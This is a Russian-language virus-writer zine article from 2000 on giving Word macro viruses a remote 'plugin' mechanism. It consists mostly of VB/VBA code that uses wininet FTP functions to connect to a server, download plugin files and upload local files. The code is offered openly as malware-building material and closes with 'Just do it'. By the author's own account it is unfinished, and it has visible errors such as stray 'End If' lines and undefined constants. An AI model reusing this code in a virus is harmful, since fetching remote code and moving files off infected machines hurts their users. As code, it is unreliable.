 |
Метавирусы
- 27:07 - by Ultras
|
 |
В этой статье я попробую рассказать - о подкачке вирусом дополнений из интернета для макро
зверей...
Всего несколько метавирусов были выпущенны на свет, вирумакеры не стали писать таких вирей из того
что это давольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот
вирус с маленьким составом. При написание такого вируса я подумал а почему на асме? и только для win32,
и выпив пивка я решил написать макро вирус с подкачкой. Мне хотелось что нибудь оригинальное и я решил сделать
это через FTP. Писал я это пока пиво не закончилось, тут описан маленький кусок алгоритма. Это просто первая
папыика написать вирус под w0rd с плагинами.
ULTRAS[MATRiX]
(c) 2000
Начало кода
~~~~~~~~~~~
Этот метод использует windoze api.
'типа windozeAPI: download virus plugin
Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
(ByVal hftpSession As Long, _
ByVal lpszRemoteFile As String, _
ByVal lpszNewFile As String, _
ByVal fFailIfExists As Boolean, _
ByVal dwFlagsAndAttributes As Long, _
ByVal dwFlags As Long, _
ByVal dwContext As Long) _
As Boolean
'типа windozeAPI: download virus plugin
Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _
(ByVal hftpSession As Long, _
ByVal lpszLocalFile As String, _
ByVal lpszRemoteFile As String, _
ByVal dwFlags As Long, _
ByVal dwContext As Long) _
As Boolean
' возможно эти api понадобиться вам в вирусе
Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _
Alias "FtpSetCurrentDirectoryA" _
(ByVal hftpSession As Long, _
ByVal lpszDirectory As String) _
As Boolean
Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _
Alias "FtpGetCurrentDirectoryA" _
(ByVal hftpSession As Long, _
ByVal lpszCurrentDirectory As String, _
lpdword As Long) _
As Boolean
Private Declare Function InternetOpen _
Lib "wininet.dll" _
Alias "InternetOpenA" _
(ByVal sAgent As String, _
ByVal lAccessType As Long, _
ByVal sProxyName As String, _
ByVal sProxyBypass As String, _
ByVal lFlags As Long) _
As Long
' всякое дерьмо, константы
Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0
Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1
Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3
Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0
Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1
Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2
Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000
Private Declare Function InternetConnect _
Lib "wininet.dll" _
Alias "InternetConnectA" _
(ByVal hInternetSession As Long, _
ByVal sServerName As String, _
ByVal nServerPort As Integer, _
ByVal sUsername As String, _
ByVal sPassword As String, _
ByVal lService As Long, _
ByVal lFlags As Long, _
ByVal lContext As Long) _
As Long
Private Const INTERNET_ERROR_BASE = 12000
Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1)
Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2)
Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3)
Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4)
Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5)
Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6)
Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7)
Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8)
Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9)
Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10)
Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11)
Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12)
Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13)
Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14)
Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15)
Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16)
Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19)
Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20)
Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21)
Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22)
Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23)
Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24)
Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25)
Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26)
Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27)
Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28)
Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29)
Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30)
Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31)
Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32)
Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33)
Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34)
Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36)
Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37)
Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38)
Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39)
Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40)
Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41)
Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42)
Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43)
Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44)
Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45)
Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46)
Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47)
Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48)
Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49)
Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50)
Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52)
Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53)
' FTP API Errors
Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110)
Private Const ERROR_FTP_DROPPED As Long = (INTERNET_ERROR_BASE + 111)
Private Const ERROR_FTP_NO_PASSIVE_MODE As Long = (INTERNET_ERROR_BASE + 112)
' Number of the TCP/IP port on the server to connect to.
Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21
Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70
Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80
Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443
Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080
Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2
Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6
Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5
Private Const INTERNET_OPTION_USERNAME As Long = 28
Private Const INTERNET_OPTION_PASSWORD As Long = 29
Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43
Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44
Private Const INTERNET_SERVICE_FTP As Long = 1
Private Const INTERNET_SERVICE_GOPHER As Long = 2
Private Const INTERNET_SERVICE_HTTP As Long = 3
Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000
Private Const INTERNET_FLAG_MULTIPART As Long = &H200000
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000
Private Declare Function FtpOpenFile _
Lib "wininet.dll" _
Alias "FtpOpenFileA" _
(ByVal hftpSession As Long, _
ByVal sFileName As String, _
ByVal lAccess As Long, _
ByVal lFlags As Long, _
ByVal lContext As Long) _
As Long
Private Declare Function FtpDeleteFile _
Lib "wininet.dll" _
Alias "FtpDeleteFileA" _
(ByVal hftpSession As Long, _
ByVal lpszFileName As String) _
As Boolean
Private Declare Function _
InternetCloseHandle _
Lib "wininet.dll" _
(ByVal hInet As Long) _
As Integer
' Private variables to support class properties
Private u_strProxyString As String
Private u_lngSessionHandle As Long
Private u_lngConnectionHandle As Long
Private u_fSessionActive As Boolean
Private u_strUserName As String
Private u_strPassword As String
Private u_strServer As String
Private u_lngTransferType As Long
Private u_strLastDLLError As String
'Функуция Connect FTP server
Public Function Connect() As Boolean
' Comments : Функуция Connect FTP server
' Returns : True если удачно, False хрен
Dim fConnected As Boolean
On Error GoTo errorz
u_fSessionActive = False
u_lngSessionHandle = 0
u_lngConnectionHandle = 0
u_strServer = txtServer ' адрес сервера
u_strUserName = txtUserName ' имя пользователя
u_strPassword = txtPassword ' пароль
u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _
INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _
INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0)
GetDLLError
' Проверяем что нам возратилось
If u_lngConnectionHandle <> 0 Then
' Мы активны!!!
fConnected = True
u_fSessionActive = True
Else
fConnected = False
End If
End If
End If
End If
_ret:
Connect = fConnected
Exit Function
errorz:
MsgBox "Ошибка"
resume _ret
End Function
'Функуция Disconnect FTP server
Public Sub Disconnect()
On Error GoTo errorz
' Дисконект только если мы подключены к FTP
If u_lngConnectionHandle <> 0 Then
ClearDLLError
' Закроем наш конект
InternetCloseHandle u_lngConnectionHandle
' Сохраним ошибку
GetDLLError
' Восстановите connhandle
u_lngConnectionHandle = 0
' Поменяем метку
u_fSessionActive = False
End If
_ret:
Exit Sub
errorz:
MsgBox "Ошибка"
Resume _ret
End Sub
Private Sub ClearDLLError()
u_strLastDLLError = ""
End Sub
Private Sub GetDLLError()
On Error GoTo errorz
u_strLastDLLError = Err.LastDLLError
_ret:
Exit Sub
errorz:
MsgBox "Ошибка"
Resume _ret
End Sub
Public Function OpenSession() As Boolean
' Comments : Открывает сеанс в ресурс Interenet(FTP)
' Returns : True if the session opened succesfully, False otherwise
Dim fOpened As Boolean
On Error GoTo errorz
' ОПЗ...
fOpened = False
ClearDLLError
If u_strProxyString = "" Then
u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _
vbNullString, vbNullString, 0)
Else
u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _
u_strProxyString, vbNullString, 0)
End If
GetDLLError
fOpened = (u_lngSessionHandle <> 0)
_ret:
OpenSession = fOpened
Exit Function
errorz:
MsgBox "Ошибка"
Resume _ret
End Function
'Закачка файла aka Download plugin
Public Function GetFile( _
strRemoteFile As String, _
strLocalFile As String) _
As Boolean
' Comments : Download plugin
' Parameters: strRemoteFile - Path и имя файла в сервере FTP
' strLocalFile - Path имя файла куда записывать клиенту
' Returns : True если удачно, False хрен
Dim fRetval As Boolean
Dim strFileOnRemote As String
Dim strDirOnRemote As String
On Error GoTo errorz
' Проверим мы в FTP
If u_fSessionActive Then
' Проверка имен файлов
If strRemoteFile <> "" And strLocalFile <> "" Then
' Получим name/path
strDirOnRemote = GetPathFromFTPPath(strRemoteFile)
strFileOnRemote = GetNameFromFTPPath(strRemoteFile)
' Измените директорий в remote сервере
RemoteChDir strDirOnRemote
ClearDLLError
' Воаля
fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _
strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _
INTERNET_FLAG_RELOAD Or u_lngTransferType, 0)
GetDLLError
End If
End If
_ret:
GetFile = fRetval
Exit Function
errorz:
MsgBox "Ошибка"
Resume _ret
End Function
'Upload plugin
Public Function PutFile( _
strLocalFile As String, _
strRemoteFile As String) _
As Boolean
' Comments : Upload plugin
' Parameters: strLocalFile - path и имя текущего файла
' strRemoteFile - path и имя текущего файла
' Returns : True если удачно, False хрен
'
Dim fRetval As Boolean
Dim strFileOnRemote As String
Dim strDirOnRemote As String
Dim strFileOnLocal As String
Dim strTmp As String
On Error GoTo errorz
' Проверим мы в FTP
If u_fSessionActive Then
' Проверка имен файлов
If strLocalFile <> "" And strRemoteFile <> "" Then
' Parse file names
strTmp = strRemoteFile
strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer))
strFileOnRemote = strRemoteFile
strFileOnLocal = strLocalFile
' Проверка корневой диры
If (strDirOnRemote = "") Then
strDirOnRemote = "/"
End If
' поменяем директорию на ftp какая нам нужна
RemoteChDir strDirOnRemote
ClearDLLError
' Посылаем файл на FTP
fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _
strFileOnRemote, u_lngTransferType, 0)
' Проверка на глюки
GetDLLError
End If
End If
_ret:
PutFile = fRetval
Exit Function
errorz:
MsgBox "Ошибка"
Resume _ret
End Function
Ну вот и все правдо может я параметры некоторые не написал влом мне проверять, пиво закончилось..
Некоторые опций я не описал типа FtpSetCurrentDirectory там и так все ясно, короче идея есть немного кода есть
хватит чтобы чтонибудь написать.... Некоторые параметры придется изменить так как писал я не в ворде a в VB 6.0.
Могут быть глюки, они и у меня были потому что я не все до конца отладил, но все таки это работало.
Just do it...
L0rd Ultra
(с) 2000
|
||
 |
 |
 |
